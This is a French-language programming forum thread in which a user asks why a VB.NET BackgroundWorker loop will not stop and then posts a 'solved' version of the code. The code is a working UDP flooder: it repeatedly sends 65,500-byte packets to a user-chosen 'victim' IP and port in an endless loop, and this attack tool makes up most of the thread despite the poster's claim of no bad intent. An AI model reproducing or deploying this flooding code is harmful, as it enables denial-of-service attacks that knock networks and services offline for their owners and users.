Problème BackgroundWorker (Annulation)

Résolu
Bobo² Messages postés 17 Date d'inscription vendredi 14 février 2014 Statut Membre Dernière intervention 20 avril 2014 - 14 févr. 2014 à 20:15
Bobo² Messages postés 17 Date d'inscription vendredi 14 février 2014 Statut Membre Dernière intervention 20 avril 2014 - 14 févr. 2014 à 22:37
Bonjour,

je travaille actuellement sur un Flooder UDP( Je n'ai aucune mauvaise intention), mais un petit problème me bloque.
Je m'explique, sur mon backgroundworker, j'ai mis une fonction en boucle, le problème c'est que quand je l'arrête, b'en... Il ne s'arrête pas !
Voici mon bout de code:
Private Sub BackgroundWorker1_DoWork(sender As Object, e As DoWorkEventArgs) Handles BackgroundWorker1.DoWork
Do
Dim victimIp As IPAddress = IPAddress.Parse(IP)
            Dim victim As New IPEndPoint(victimIp, Port)
            Dim packet As Byte() = New Byte(65500) {}
            Dim socket As New Socket(AddressFamily.InterNetwork,SocketType.Dgram, ProtocolType.Udp)
            socket.SendTo(packet, victim)
            socket.SendTo(packet, victim)
            socket.SendTo(packet, victim)
            socket.SendTo(packet, victim)
            socket.SendTo(packet, victim)
         Loop
    End Sub
 

JE vous remercie d'avoir lu et de vos futur reponse, je tiens aussi a m'excuser pour mes nombreuses fautes d'orhtographe.
Cordialement Bobo².

3 réponses

ucfoutu Messages postés 18038 Date d'inscription lundi 7 décembre 2009 Statut Modérateur Dernière intervention 11 avril 2018 211
14 févr. 2014 à 21:41
Bonjour,
" le problème c'est que quand je l'arrête, b'en... Il ne s'arrête pas !"
on voit bien une boucle do ... loop, mais on ne voit rien qui tente de l'arrêter !
Tu tentes cet arrêt comment ?
0
Bobo² Messages postés 17 Date d'inscription vendredi 14 février 2014 Statut Membre Dernière intervention 20 avril 2014
14 févr. 2014 à 22:32
Bonjour, merci d'avoir repondu !
J'arrete ça comme cela:

backgroundworker.cancelAsync

Merci.
0
Bobo² Messages postés 17 Date d'inscription vendredi 14 février 2014 Statut Membre Dernière intervention 20 avril 2014
14 févr. 2014 à 22:37
Bonjour, problème résolu !! Je partage mon code.


Do While StartProcess = False
Dim victimIp As IPAddress = IPAddress.Parse(TextBox5.Text)
Dim victim As New IPEndPoint(victimIp, TextBox2.Text)
Dim packet As Byte() = New Byte(TextBox7.Text) {}
Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
socket.SendTo(packet, victim)
Loop
Il faut importer StartProcess biensur !


Dim StartProcess As Boolean = False

Donc si vous mettez des boutons pour alterner true/false pour arrêter ou démarrer le processus d'arrière plan.

Merci encore a celui qui à repondu.
0
Rejoignez-nous